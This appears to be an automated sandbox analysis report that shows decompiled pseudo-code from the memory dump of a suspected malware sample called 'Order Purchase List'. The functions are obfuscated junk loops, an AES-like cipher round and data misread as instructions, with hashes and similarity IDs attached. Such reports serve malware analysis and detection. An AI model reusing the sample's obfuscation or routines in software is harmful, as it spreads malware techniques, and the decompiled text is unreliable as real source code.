                                      
                                      				asm("adc ecx, 0x97177ae9");
                                      				_t35 = _t34 |  *0x72939210;
                                      				_pop(_t71);
                                      				_t49 = (_t47 ^  *0x64d6212) - 8;
                                      				_t66 = _t65 & 0x49c5c31b;
                                      				 *0x2e216e12 =  *0x2e216e12 << 0x46;
                                      				_t43 = 0x83b26005;
                                      				asm("adc bl, 0xf2");
                                      				if( *0x2e216e12 >= 0 &&  *0xd1c5417c * 0xd0cc <= 0) {
                                      					__edi = __edi ^  *0xea6e70d1;
                                      					__ah = __ah & 0x0000000a;
                                      					_push( *0x2c9cc396);
                                      				}
                                      				L1:
                                      				_pop( *0x2a529409);
                                      				_t43 = _t43 + 0x78c1d903;
                                      				_t49 = _t49 -  *0x550d1e30;
                                      				_push(_t64);
                                      				asm("sbb bl, 0xd0");
                                      				asm("adc [0x5e9ea6c9], bl");
                                      				_t37 = _t37 &  *0xee0c8d29;
                                      				asm("adc ebx, [0x311d046c]");
                                      				asm("sbb ecx, 0xc989e08c");
                                      				asm("lodsd");
                                      				_push(_t43);
                                      				_t64 = _t64 - 1;
                                      				asm("rcl byte [0x3fbd9008], 0xe");
                                      				_t66 = _t66 - 1;
                                      				_t58 = _t58 - 0xb1242c2e;
                                      				if((_t35 & 0x1ab4b105) < 0) {
                                      					asm("sbb [0xed0dd771], edx");
                                      					 *0x98a9087 =  *0x98a9087 - _t66;
                                      					asm("adc ecx, [0xd3d3b435]");
                                      					if( *0x98a9087 <= 0) {
                                      						asm("adc [0x8d574f77], ebx");
                                      						_pop(_t64);
                                      						_push( *0x74104a36);
                                      						asm("lodsd");
                                      						_t71 = _t71 ^ 0x79383833;
                                      						asm("rcr dword [0xc5d262bf], 0x61");
                                      						asm("rol dword [0x640a03eb], 0x1e");
                                      						asm("sbb ebp, [0x76fe1429]");
                                      						asm("sbb bl, [0x711e2f82]");
                                      						_push( *0x53b27e09);
                                      						_t37 = 0x287ca813 -  *0x99051ecf;
                                      						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
                                      						_t43 = 0xa;
                                      						_t49 = ((_t49 |  *0x3fb272eb) &  *0xe555ddf2) +  *0xaf2e830b;
                                      						asm("rol byte [0xb64a5934], 0x33");
                                      						_t58 = _t58;
                                      						if(_t58 < 0) {
                                      							asm("sbb edx, [0x6aaf0a71]");
                                      							_push(0x811d5329);
                                      							_t66 = _t66 - 1;
                                      							_t64 = _t64 - 1;
                                      							if(_t64 < 0) {
                                      								_t49 = _t49 ^  *0x11030f71;
                                      								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
                                      								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
                                      								_t37 = _t37 + 0xa0;
                                      								asm("rol byte [0x50590312], 0x7d");
                                      								asm("sbb dh, [0x5305c024]");
                                      								_t35 = _t35 & 0x799f3c83;
                                      								_pop(_t60);
                                      								_pop( *0xfdc51691);
                                      								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
                                      								asm("sbb [0x8a15626c], eax");
                                      								_t58 = _t60 + 1;
                                      								_t43 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
                                      								if(_t43 < 0) {
                                      									asm("stosb");
                                      									asm("rcl byte [0x33670730], 0x95");
                                      									 *0x614bdadb =  *0x614bdadb | _t64;
                                      									_t66 = 0x8200a671;
                                      									if( *0x614bdadb <= 0) {
                                      										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
                                      										asm("adc edx, [0xe73ac826]");
                                      										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
                                      										 *0xbd0901df =  *0xbd0901df >> 0x97;
                                      										_t73 = _t71 - 1 +  *0x9c9eb206;
                                      										_pop(_t61);
                                      										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t35;
                                      										 *0xe82cce68 =  *0xe82cce68 ^ _t66;
                                      										 *0xe3cd41ea = _t35;
                                      										_t43 = _t43 + 1;
                                      										 *0x1f4f8938 =  *0x1f4f8938 ^ _t43;
                                      										asm("rcr dword [0x3cb441f3], 0xf1");
                                      										_t58 = (_t61 - 0x00000001 |  *0xaa92b917) &  *0x48242bde;
                                      										asm("adc [0x704bccc9], cl");
                                      										 *0xec116eb6 = _t35 -  *0x4c2f0d80;
                                      										_t37 =  *0x38028e97;
                                      										_t35 =  *0xad2fb260 * 0x81d;
                                      										_push(_t73);
                                      										 *0xfe811d01 = _t66 ^ 0xca1c871b;
                                      										asm("movsw");
                                      										_t71 =  *0x312dedfd;
                                      										 *0x312dedfd = _t73;
                                      										_t64 = _t64 + 1;
                                      										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
                                      										_t57 =  *0xd4d909d1;
                                      										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
                                      										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
                                      										 *0xf202931b =  *0xf202931b - _t57;
                                      										_t49 = _t57 ^ 0x000000e6;
                                      										_t66 =  *0x96049ebe;
                                      										asm("adc ecx, [0x890ef031]");
                                      										 *0xef5459e5 =  *0xef5459e5 ^ _t35;
                                      										asm("sbb eax, 0x486a0e97");
                                      										 *0xe78fc910 =  *0xe78fc910 - _t37;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L1;
                                      			}


















                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Wh;
                                      • API String ID: 0-697344040
                                      • Opcode ID: 6e40854757242b2db8ac4c0d80fa4476227fdfa1255ec40d66d5ca9968501250
                                      • Instruction ID: 2d24da6d8678cbbe5c079d4f9382dae2200431e0499f410fed652bcee60a3b1c
                                      • Opcode Fuzzy Hash: 6e40854757242b2db8ac4c0d80fa4476227fdfa1255ec40d66d5ca9968501250
                                      • Instruction Fuzzy Hash: 0B713032A08384CFD306CF39C889B813FB2F352B64B48425FD5A2575E2D7791656CB89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 40%
                                      			E0041B8D6() {
                                      				signed int _t32;
                                      				signed int _t33;
                                      				void* _t44;
                                      				signed char _t50;
                                      				void* _t65;
                                      				void* _t66;
                                      				void* _t77;
                                      				signed int _t78;
                                      				void* _t80;
                                      				void* _t81;
                                      				signed int _t83;
                                      				signed int _t89;
                                      				signed int _t90;
                                      				intOrPtr _t92;
                                      
                                      				L0:
                                      				_pop( *0x2a529409);
                                      				asm("sbb bl, 0xd0");
                                      				asm("adc [0x5e9ea6c9], bl");
                                      				asm("adc ebx, [0x311d046c]");
                                      				asm("sbb ecx, 0xc989e08c");
                                      				asm("lodsd");
                                      				_push(_t44 + 0x78c1d903);
                                      				asm("rcl byte [0x3fbd9008], 0xe");
                                      				_t81 = _t80 - 1;
                                      				_t66 = _t65 - 0xb1242c2e;
                                      				if((_t32 & 0x1ab4b105) < 0) {
                                      					asm("sbb [0xed0dd771], edx");
                                      					 *0x98a9087 =  *0x98a9087 - _t81;
                                      					asm("adc ecx, [0xd3d3b435]");
                                      					if( *0x98a9087 <= 0) {
                                      						asm("adc [0x8d574f77], ebx");
                                      						_pop(_t77);
                                      						_push( *0x74104a36);
                                      						asm("lodsd");
                                      						_t90 = _t89 ^ 0x79383833;
                                      						asm("rcr dword [0xc5d262bf], 0x61");
                                      						asm("rol dword [0x640a03eb], 0x1e");
                                      						asm("sbb ebp, [0x76fe1429]");
                                      						asm("sbb bl, [0x711e2f82]");
                                      						_push( *0x53b27e09);
                                      						 *0xd7ab022f =  *0xd7ab022f >> 0xe0;
                                      						asm("rol byte [0xb64a5934], 0x33");
                                      						if(_t66 < 0) {
                                      							asm("sbb edx, [0x6aaf0a71]");
                                      							_push(0x811d5329);
                                      							_t78 = _t77 - 1;
                                      							if(_t78 < 0) {
                                      								 *0x6df80ce0 =  *0x6df80ce0 + 0xa;
                                      								 *0x8de945f3 =  *0x8de945f3 ^ 0x287ca813;
                                      								asm("rol byte [0x50590312], 0x7d");
                                      								asm("sbb dh, [0x5305c024]");
                                      								_t33 = _t32 & 0x799f3c83;
                                      								_pop( *0xfdc51691);
                                      								 *0xb15653a9 =  *0xb15653a9 >> 0x83;
                                      								asm("sbb [0x8a15626c], eax");
                                      								_t50 = 0x25ce0183 +  *0x2bd1fb8f & 0x000000ca;
                                      								if(_t50 < 0) {
                                      									asm("stosb");
                                      									asm("rcl byte [0x33670730], 0x95");
                                      									 *0x614bdadb =  *0x614bdadb | _t78;
                                      									_t83 = 0x8200a671;
                                      									if( *0x614bdadb <= 0) {
                                      										 *0x962d1bf0 =  *0x962d1bf0 + 0x287ca813;
                                      										asm("adc edx, [0xe73ac826]");
                                      										 *0x2f3f1ccb =  *0x6a261e7f * 0xd13b -  *0x3509b8dc;
                                      										 *0xbd0901df =  *0xbd0901df >> 0x97;
                                      										_t92 = _t90 - 1 +  *0x9c9eb206;
                                      										 *0xab3e2fc4 =  *0xab3e2fc4 ^ _t33;
                                      										 *0xe82cce68 =  *0xe82cce68 ^ _t83;
                                      										 *0xe3cd41ea = _t33;
                                      										 *0x1f4f8938 =  *0x1f4f8938 ^ _t50 + 0x00000001;
                                      										asm("rcr dword [0x3cb441f3], 0xf1");
                                      										asm("adc [0x704bccc9], cl");
                                      										 *0xec116eb6 = _t33 -  *0x4c2f0d80;
                                      										_push(_t92);
                                      										 *0xfe811d01 = _t83 ^ 0xca1c871b;
                                      										asm("movsw");
                                      										 *0x312dedfd = _t92;
                                      										 *0x38ec6138 =  *0x38ec6138 >> 0xd0;
                                      										 *0xd4d909d1 =  *0x2f3f1ccb + 0x00000001 & 0x00000038;
                                      										 *0xb1e0c89 =  *0xb1e0c89 << 0x80;
                                      										 *0xf202931b =  *0xf202931b -  *0xd4d909d1;
                                      										asm("adc ecx, [0x890ef031]");
                                      										 *0xef5459e5 =  *0xef5459e5 ^  *0xad2fb260 * 0x0000081d;
                                      										asm("sbb eax, 0x486a0e97");
                                      										 *0xe78fc910 =  *0xe78fc910 -  *0x38028e97;
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				goto L0;
                                      			}


















                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: Wh;
                                      • API String ID: 0-697344040
                                      • Opcode ID: 89f2f816299d6a76901ab0f58a9247b72810f4b45476aa439f871825cf0b4c03
                                      • Instruction ID: d5a88a8153257204d55b39bc351febb721ac014a0b6a69b3edffff066d93ae99
                                      • Opcode Fuzzy Hash: 89f2f816299d6a76901ab0f58a9247b72810f4b45476aa439f871825cf0b4c03
                                      • Instruction Fuzzy Hash: 6C512032A18384CFC306CF39C889B853BB2F752764748435FD5A297192D775125ACB89
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 26%
                                      			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				void* _t273;
                                      				signed int _t274;
                                      				signed int _t282;
                                      				signed int* _t358;
                                      				signed int _t383;
                                      				signed int* _t409;
                                      				signed int _t429;
                                      				signed int _t458;
                                      				signed int _t478;
                                      				signed int _t560;
                                      				signed int _t603;
                                      
                                      				_t273 = __eax;
                                      				asm("ror edi, 0x8");
                                      				asm("rol edx, 0x8");
                                      				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                      				asm("ror ebx, 0x8");
                                      				asm("rol edx, 0x8");
                                      				_v20 = _t458;
                                      				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                      				asm("ror ebx, 0x8");
                                      				asm("rol edx, 0x8");
                                      				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                      				asm("ror esi, 0x8");
                                      				asm("rol edx, 0x8");
                                      				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                      				asm("ror edx, 0x10");
                                      				asm("ror esi, 0x8");
                                      				asm("rol esi, 0x8");
                                      				_v24 = _t282;
                                      				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                      				asm("ror esi, 0x10");
                                      				asm("ror ebx, 0x8");
                                      				asm("rol ebx, 0x8");
                                      				_t603 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                      				asm("ror ebx, 0x8");
                                      				asm("ror edi, 0x10");
                                      				asm("rol edi, 0x8");
                                      				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                      				asm("ror edi, 0x10");
                                      				asm("ror ebx, 0x8");
                                      				asm("rol ebx, 0x8");
                                      				_t409 =  &(__ecx[8]);
                                      				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                      				_t478 = (_a4 >> 1) - 1;
                                      				_a4 = _t478;
                                      				if(_t478 != 0) {
                                      					do {
                                      						asm("ror edi, 0x10");
                                      						asm("ror ebx, 0x8");
                                      						asm("rol ebx, 0x8");
                                      						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                      						asm("ror edi, 0x10");
                                      						asm("ror ebx, 0x8");
                                      						asm("rol ebx, 0x8");
                                      						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                      						asm("ror ebx, 0x8");
                                      						asm("ror edi, 0x10");
                                      						asm("rol edi, 0x8");
                                      						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t603 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                      						asm("ror edi, 0x10");
                                      						asm("ror edx, 0x8");
                                      						asm("rol edx, 0x8");
                                      						_v24 = _t383;
                                      						_t560 =  *(__eax + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                      						asm("ror edx, 0x10");
                                      						asm("ror esi, 0x8");
                                      						asm("rol esi, 0x8");
                                      						_t429 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t560 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                      						asm("ror esi, 0x10");
                                      						asm("ror ebx, 0x8");
                                      						asm("rol ebx, 0x8");
                                      						_t603 =  *(__eax + 4 + (_t560 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                      						_v12 = _t560;
                                      						asm("ror edi, 0x8");
                                      						asm("ror ebx, 0x10");
                                      						asm("rol ebx, 0x8");
                                      						_v16 =  *(__eax + 4 + (_t560 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                      						asm("ror ebx, 0x10");
                                      						asm("ror edi, 0x8");
                                      						asm("rol edi, 0x8");
                                      						_t409 =  &(_t409[8]);
                                      						_t205 =  &_a4;
                                      						 *_t205 = _a4 - 1;
                                      						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                      					} while ( *_t205 != 0);
                                      				}
                                      				asm("ror ebx, 0x8");
                                      				asm("rol edi, 0x8");
                                      				 *_a8 = (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t429 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t603 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                      				asm("ror ebx, 0x8");
                                      				asm("rol edi, 0x8");
                                      				_a8[1] = (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t603 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t429 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                      				asm("ror ebx, 0x8");
                                      				asm("rol edi, 0x8");
                                      				_t358 = _a8;
                                      				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t429 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t603 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                      				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                      				asm("ror ecx, 0x8");
                                      				asm("rol edi, 0x8");
                                      				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
                                      				return _t274;
                                      			}

                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.396010112.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_Order Purchase List.jbxd
                                      Yara matches
                                      Similarity
                                      • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                      • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                      • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                      • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E009F732F(void* __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi, signed int __esi) {
                                      				void* _t85;
                                      				signed int _t88;
                                      				signed char _t89;
                                      				signed char _t90;
                                      				signed char _t92;
                                      				signed int _t94;
                                      				signed char _t95;
                                      				signed char _t96;
                                      				signed char _t97;
                                      				signed char _t98;
                                      				signed char _t99;
                                      				signed char _t101;
                                      				signed char _t103;
                                      				signed int _t104;
                                      				signed int _t105;
                                      				signed char _t106;
                                      				signed char _t108;
                                      				intOrPtr* _t109;
                                      				signed char _t110;
                                      				intOrPtr* _t111;
                                      				signed char _t112;
                                      				signed int _t113;
                                      				signed char _t115;
                                      				signed char _t116;
                                      				intOrPtr* _t117;
                                      				signed int _t118;
                                      				signed char _t121;
                                      				intOrPtr* _t123;
                                      				signed int _t125;
                                      				signed int _t127;
                                      				signed char _t128;
                                      				signed char _t129;
                                      				signed int _t131;
                                      				signed int _t133;
                                      				signed int _t135;
                                      				signed char _t137;
                                      				signed char _t139;
                                      				void* _t141;
                                      				void* _t143;
                                      				void* _t144;
                                      				void* _t147;
                                      				signed int _t151;
                                      				void* _t152;
                                      				void* _t155;
                                      				void* _t162;
                                      				void* _t164;
                                      				intOrPtr* _t169;
                                      				signed int _t170;
                                      				void* _t172;
                                      				signed int _t175;
                                      				signed int _t176;
                                      				signed int _t178;
                                      				signed int _t179;
                                      				signed int _t180;
                                      				void* _t181;
                                      				signed int _t183;
                                      				signed int _t185;
                                      				signed int _t186;
                                      				signed int _t187;
                                      				void* _t190;
                                      				signed int _t194;
                                      
                                      				_t185 = __esi;
                                      				_t85 = __eax + 3;
                                      				 *((intOrPtr*)(__edx + 0x22)) =  *((intOrPtr*)(__edx + 0x22)) + __ebx;
                                      				 *__ebx =  *__ebx + _t85;
                                      				asm("sbb [ecx+0x17], dl");
                                      				_push(es);
                                      				 *__ebx =  *__ebx + _t85;
                                      				 *__edx =  *__edx + _t85;
                                      				asm("adc ecx, [eax]");
                                      				asm("sbb al, 0x16");
                                      				asm("scasd");
                                      				_t88 = _t85 + 0x00000003 + __ecx &  *(_t85 + 3 + __ecx);
                                      				 *_t88 =  *_t88 + _t88;
                                      				 *__ebx =  *__ebx + __edx;
                                      				 *(_t88 + 0x304b50b) =  *(_t88 + 0x304b50b) | __ecx;
                                      				 *__ebx =  *__ebx + _t88;
                                      				_t89 = _t88 &  *_t88;
                                      				 *_t89 =  *_t89 + _t89;
                                      				 *__ebx =  *__ebx + __edx;
                                      				 *(__ebx + __ecx + 0x304bb) =  *(__ebx + __ecx + 0x304bb) | __edx;
                                      				_t90 = _t89 | 0x00000023;
                                      				 *_t90 =  *_t90 + _t90;
                                      				 *_t90 =  *_t90 + _t90;
                                      				asm("adc ecx, [eax]");
                                      				asm("enter 0x404, 0x0");
                                      				_t92 = _t90 ^  *__edi ^  *__ebx;
                                      				 *_t92 =  *_t92 + _t92;
                                      				 *_t92 =  *_t92 + _t92;
                                      				asm("adc [eax], ebx");
                                      				_push(__edi);
                                      				_pop(ss);
                                      				_t94 = _t92 - 0x57000403 &  *(_t92 - 0x57000403);
                                      				 *_t94 =  *_t94 + _t94;
                                      				 *__esi =  *__esi + _t94;
                                      				asm("sbb [ecx+0x17], dl");
                                      				_push(es);
                                      				 *((intOrPtr*)(_t94 + _t94)) =  *((intOrPtr*)(_t94 + _t94)) + _t94;
                                      				asm("pushad");
                                      				_t95 = _t94 &  *_t94;
                                      				 *_t95 =  *_t95 + _t95;
                                      				 *__ecx =  *__ecx + __edx;
                                      				 *((intOrPtr*)(__ecx + 0x404cc19)) =  *((intOrPtr*)(__ecx + 0x404cc19)) + _t95;
                                      				 *__ebx =  *__ebx + __ecx;
                                      				_push(ss);
                                      				 *(__ecx + 0x1b) =  *(__ecx + 0x1b) | __edx;
                                      				asm("aam 0x4");
                                      				_push(es);
                                      				 *_t95 =  *_t95 + __ebx;
                                      				_t96 = _t95 & 0x00000000;
                                      				 *_t96 =  *_t96 + _t96;
                                      				 *__esi =  *__esi + _t96;
                                      				_t139 = __ebx | __edx;
                                      				asm("adc [edi+0x3], al");
                                      				_push(es);
                                      				 *__edx =  *__edx + _t139;
                                      				_t97 = _t96 & 0x00000000;
                                      				 *_t97 =  *_t97 + _t97;
                                      				 *__esi =  *__esi + _t97;
                                      				 *_t139 =  *_t139 | _t97;
                                      				asm("adc [eax], edx");
                                      				 *__esi =  *__esi + _t97;
                                      				 *_t194 =  *_t194 + __ecx;
                                      				 *_t97 =  *_t97 + _t97;
                                      				 *_t139 =  *_t139 + __edx;
                                      				 *(__ecx + _t139 + 0x704d4) =  *(__ecx + _t139 + 0x704d4) | __edx;
                                      				asm("arpl [eax+eax], sp");
                                      				 *_t97 =  *_t97 + _t97;
                                      				 *__esi =  *__esi + _t97;
                                      				asm("sbb [ecx+0x17], dl");
                                      				_push(es);
                                      				 *__edi =  *__edi + _t97;
                                      				 *_t194 =  *_t194 + __edx;
                                      				asm("les eax, [edx]");
                                      				asm("out dx, eax");
                                      				_t178 = __edx |  *0xe4000700;
                                      				_t98 = _t97 & 0x00000000;
                                      				 *_t98 =  *_t98 + _t98;
                                      				 *__ecx =  *__ecx + _t98;
                                      				_t169 = __ecx + __ecx;
                                      				asm("sbb eax, [esi]");
                                      				 *_t98 =  *_t98 + _t169;
                                      				 *_t169 =  *_t169 + _t169;
                                      				_t99 = _t98 ^  *_t98;
                                      				 *_t99 =  *_t99 + _t99;
                                      				 *((intOrPtr*)(_t139 + 0xb)) =  *((intOrPtr*)(_t139 + 0xb)) + _t99;
                                      				 *_t139 =  *_t139 + _t178;
                                      				_t101 = 0x00000001 ^  *1;
                                      				 *_t101 =  *_t101 + 1;
                                      				 *((intOrPtr*)(_t139 + 0xb)) =  *((intOrPtr*)(_t139 + 0xb)) + _t101;
                                      				asm("les eax, [ecx]");
                                      				asm("fild word [eax+ecx]");
                                      				 *((intOrPtr*)(_t178 + __esi)) =  *((intOrPtr*)(_t178 + __esi)) + _t139;
                                      				 *_t101 =  *_t101 + _t101;
                                      				 *_t101 =  *_t101 + _t101;
                                      				_t179 = _t178;
                                      				_t141 = 1 + _t139 + _t169;
                                      				 *__esi =  *__esi + 1;
                                      				_t103 = _t101 + 0x00000009 ^  *(_t101 + 9);
                                      				 *_t103 = 1 +  *_t103;
                                      				 *((intOrPtr*)(_t141 + 0xb)) =  *((intOrPtr*)(_t141 + 0xb)) + _t103;
                                      				asm("loop 0x5");
                                      				asm("fild word [ecx+ecx]");
                                      				 *__edi =  *__edi + _t169;
                                      				_t104 = _t103 ^  *_t103;
                                      				 *_t104 =  *_t104 + _t104;
                                      				_t28 = _t141 + 0xb;
                                      				 *_t28 =  *((intOrPtr*)(_t141 + 0xb)) + _t104;
